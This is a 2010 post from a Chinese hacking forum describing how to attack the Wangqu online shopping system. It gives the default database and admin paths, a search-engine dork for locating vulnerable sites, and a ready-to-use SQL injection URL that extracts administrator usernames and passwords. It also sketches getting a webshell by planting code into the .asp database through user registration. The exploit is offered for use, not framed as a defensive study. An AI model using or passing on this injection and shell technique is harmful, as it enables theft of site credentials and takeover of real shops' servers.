Board logo

标题: 网趣网上购物系统时尚版 V最新漏洞 [打印本页]

作者: gxp118    时间: 2010-1-20 17:40     标题: 网趣网上购物系统时尚版 V最新漏洞

数据库的默认后串为.asp,可以考虑在前台注册用户用户给数据库里面插马.

1. 分析源码.
2. 数据库中插马.
3. 寻找上传之类的文件分析.
4. 后台的利用分析.

2.数据库.

\cnhwwdata\cnhww.asp 默认的数据库路径.

如果数据库路径没修改,可以考虑在前台注册用户拿shell

Cnhww 后台用户表段.

User 前台用户表段.

查询Cnhww 表里面的
Admin /password


后台拿shell的方法

网趣网上购物系统时尚版

后台默认地址: admin/login.asp
关键字
inurl:Price.asp?anid=


利用方法
/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww
作者: hyrz    时间: 2010-1-25 12:18

利用率貌似有点低。
作者: hyrz    时间: 2010-1-25 12:19

利用率貌似有点低。
作者: xinqi8899    时间: 2010-8-28 11:17

后台用户表段.大部分都修改了名称




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2